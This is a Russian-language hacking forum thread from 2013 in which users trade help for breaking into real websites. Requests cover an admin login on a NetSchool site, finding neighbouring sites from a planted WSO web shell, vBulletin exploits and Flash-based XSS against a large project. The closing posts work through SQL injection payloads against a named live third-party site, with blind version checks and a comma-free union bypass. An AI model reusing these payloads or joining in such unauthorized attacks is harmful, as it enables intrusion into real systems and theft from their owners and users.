ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

22.12.2013, 09:59
|
|
Guest
Сообщений: n/a
Провел на форуме: 20657
Репутация:
2
|
|
Сообщение от None
написать тебе бажный скрипт ?
этот вопрос с сарказмом?)
Вообщем,существует сайт с движком NetSchool (4.50 версия). Мне нужно зайти с админского аккаунта. есть какие нибудь уязвимости,и,если можно,написать поподробнее о них.
|
|
|
|

22.12.2013, 16:02
|
|
Новичок
Регистрация: 15.06.2010
Сообщений: 0
Провел на форуме: 16546
Репутация:
0
|
|
При использовании WSO шелла, иногда можно опуститься на каталог ниже и увидеть соседние сайты на сервере. Иногда папка имеет название site.com, и тогда я могу просто скопировать название и перейти на сайт, но иногда название не совпадает с доменом. Как узнать точный домен?
|
|
|

22.12.2013, 23:34
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме: 70640
Репутация:
0
|
|
Сообщение от BOSS
BOSS said:
При использовании WSO шелла, иногда можно опуститься на каталог ниже и увидеть соседние сайты на сервере. Иногда папка имеет название site.com, и тогда я могу просто скопировать название и перейти на сайт, но иногда название не совпадает с доменом. Как узнать точный домен?
Как вариант посмотреть все домены на ip и сверить название папки с названием сайта.
|
|
|

23.12.2013, 01:59
|
|
Новичок
Регистрация: 15.06.2010
Сообщений: 0
Провел на форуме: 16546
Репутация:
0
|
|
Сообщение от kingbeef
kingbeef said:
Как вариант посмотреть все домены на ip и сверить название папки с названием сайта.
Как их посмотреть? Где?
|
|
|

23.12.2013, 06:39
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Сообщение от BOSS
BOSS said:
Как их посмотреть? Где?
немного поможет разобраться:
https://forum.antichat.net/thread397144.html
|
|
|

24.12.2013, 20:46
|
|
Guest
Сообщений: n/a
Провел на форуме: 1743
Репутация:
0
|
|
Помогите найти что нибудь для vbulletin 3.8.7 pl3. Про сплойт через EggAvatar - знаю, а кроме этого ничего не нашёл.
|
|
|
|

25.12.2013, 07:43
|
|
Новичок
Регистрация: 03.04.2010
Сообщений: 1
Провел на форуме: 18657
Репутация:
0
|
|
Подскажите, кто знает. Есть онлайн проект на флеше. Нашел форму которая разрешает загрузку и вывод флеш контента пользователю. (как пример - личные сообщения пропускают и показывают всю флешку). С ActionScript знаком совсем мало. Можно сказать - вообще не знаком
Дайте пару советов, если можно с примерами хотя-бы алерта (если это возможно вообще в AS). Можно в ЛС, у кого спортивный интерес) (в проекте более миллиона участников).
|
|
|

25.12.2013, 19:14
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме: 346497
Репутация:
303
|
|
Быть может, у кого появятся какие идеи как реализовать.
Валидное условие:
http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+order+by+1--+
Валидное условие:
http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+or+1=1--+
Невалидное условие:
http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+or+1=0--+
Неполучилось провести объединение через union, ни через blind конструкции.
условие
http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn' or 5=find_in_set(substring((SELECT version()),1,1),'1,1,2,3,4,5')--+ не срабатывает, не срабатывает даже substring в чистом варианте виде +or+5=substring(version(),1,1)--+
Если не трудно, то в личку если есть конкретные варианты. С меня бонус
P.S. Походу где-то рубиться запятая не давая использовать функции соотв
|
|
|

25.12.2013, 22:18
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+and+1=1+and+ substring((@@version)+from+1+for+1)=4+--+ FALSE
http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+and+1=1+and+ substring((@@version)+from+1+for+1)=5+--+ TRUE
|
|
|

25.12.2013, 23:56
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Покрутил в сторону join(), но адекватного вывода не нашел((
Сообщение от None
http://videos.webpronews.com/video/playlist.php?movie_name=-ses_jcolborn'+and+1=1+union+(select+*+from+(select +1)+a1+join(select+2)+a2+join(select+3)+a3+)+--+
пока что как вариант написать сплоит под блинд, завтра если будет возможность еще покручу, скуль интересная)
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|